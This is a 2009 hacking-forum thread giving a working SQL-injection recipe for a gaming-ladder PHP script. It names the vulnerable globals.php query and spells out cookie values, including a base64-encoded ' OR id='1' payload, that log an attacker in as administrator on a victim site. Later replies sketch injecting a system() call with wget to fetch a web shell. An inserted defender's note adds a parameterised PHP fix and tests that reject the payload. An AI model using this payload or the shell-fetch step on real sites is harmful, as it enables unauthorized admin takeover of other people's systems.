IT Security and Insecurity Portal |
How to hack My Gaming Ladder

Posted: Thu Aug 13, 2009 4:55 am
xalupeao
Regular user
Joined: May 23, 2009
Posts: 17
Location: Santiago, Chile

Type: SQL Injection
Objective: get managet :B
--------------------
Search in Google
-------------------
Ladder Script By
-------------------
Requirements
-------------------
• Firefox + Web Developer Complement
---------------
File Attack
---------------
globals.php
SQL Query doesn't export magic quotes
LINE 8 : $userinfo=mysql_query("SELECT id,alias,pass FROM users WHERE id='$cplyrid' AND pass='$cplyrpw' ");
jejejej ! :B
------------------
Hacking
------------------
Enter in the site: www.yourvictim.tld/ladder/
Create a Cookie [• In menu Cookies -> Add Cookie]
Name = AID
Value= 1
Tick session cookie
----
Add other cookie
Name= APW
Value = JyBPUiBpZD0nMScgQU5EIHBhc3MgTElLRSAnJQ==
Tick session cookie
Reload (F5)
Enter Admin =)
Note : requires that the administrator has id 1
Note 2: JyBPUiBpZD0nMScgQU5EIHBhc3MgTElLRSAnJQ== is ' OR id='1' AND pass LIKE '% but encrypted in base64()
=)
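
Defender's note, added here and not part of the original post or the Ladder script's own code: the lookup quoted from globals.php line 8, rewritten so that cookie data is bound as a parameter and the secret is checked in PHP instead of in the SQL text. Assumptions: AID is a plain numeric id, APW is base64-encoded as Note 2 implies, the `pass` column holds password_hash() output, `ladder_auth` is a hypothetical function name, and in-memory SQLite (pdo_sqlite) stands in for the MySQL database.

```php
<?php
// Added example, not the project's code. Table and column names come from the
// query quoted in the post; everything else is an assumption (see lead-in).

function ladder_auth(PDO $db, array $cookies): ?array
{
    // Validate the id as a positive integer before it gets near the database.
    $id = filter_var($cookies['AID'] ?? null, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    // Strict mode rejects input that is not well-formed base64.
    $pw = base64_decode((string)($cookies['APW'] ?? ''), true);
    if ($id === false || $pw === false || $pw === '') {
        return null;
    }

    // Bound parameter: cookie data is never concatenated into the SQL text.
    $stmt = $db->prepare('SELECT id, alias, pass FROM users WHERE id = :id');
    $stmt->execute([':id' => $id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // The secret is compared in PHP with a hash check, not inside the query.
    if ($row === false || !password_verify($pw, $row['pass'])) {
        return null;
    }
    return ['id' => (int)$row['id'], 'alias' => $row['alias']];
}

// Constructed test data: one admin row with a constructed password.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, alias TEXT, pass TEXT)');
$ins = $db->prepare('INSERT INTO users (id, alias, pass) VALUES (?, ?, ?)');
$ins->execute([1, 'admin', password_hash('constructed-admin-secret', PASSWORD_DEFAULT)]);

$cases = [
    'valid admin cookie'   => ['AID' => '1', 'APW' => base64_encode('constructed-admin-secret')],
    'cookie from the post' => ['AID' => '1', 'APW' => 'JyBPUiBpZD0nMScgQU5EIHBhc3MgTElLRSAnJQ=='],
    'non-numeric id'       => ['AID' => 'not-a-number', 'APW' => base64_encode('x')],
];
foreach ($cases as $label => $cookies) {
    $user = ladder_auth($db, $cookies);
    printf("%-22s => %s\n", $label, $user ? "authenticated as {$user['alias']}" : 'rejected');
}
```

Only the first case authenticates; the APW value from the post decodes to a string that is treated as an ordinary wrong password. Keeping credentials out of cookies altogether and using a server-side session would remove this lookup from every request.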

Posted: Thu Aug 13, 2009 7:48 am
gibbocool
Advanced user
Joined: Jan 22, 2008
Posts: 208

Posted: Thu Aug 13, 2009 11:59 am
BoboTiG
Advanced user
Joined: Jun 22, 2009
Posts: 66

Posted: Fri Aug 14, 2009 11:05 am
xalupeao
Regular user
Joined: May 23, 2009
Posts: 17
Location: Santiago, Chile

but need code to insert a shell XD

Posted: Fri Aug 14, 2009 1:46 pm
gibbocool
Advanced user
Joined: Jan 22, 2008
Posts: 208

xalupeao wrote: but need code to insert a shell XD
That might be possible.. but more complicated. If you can get it to do something like this...
mysql_query("SELECT id,alias,pass FROM users WHERE id='1'"); system("wget -O http://shell.txt"); //$cplyrid' AND pass='$cplyrpw' ");

Posted: Fri Aug 14, 2009 6:23 pm
xalupeao
Regular user
Joined: May 23, 2009
Posts: 17
Location: Santiago, Chile

Posted: Fri Aug 14, 2009 11:21 pm
gibbocool
Advanced user
Joined: Jan 22, 2008
Posts: 208

well you can test it by trying to get phpinfo() to work.

www.waraxe.us Forum Index -> All other software
All times are GMT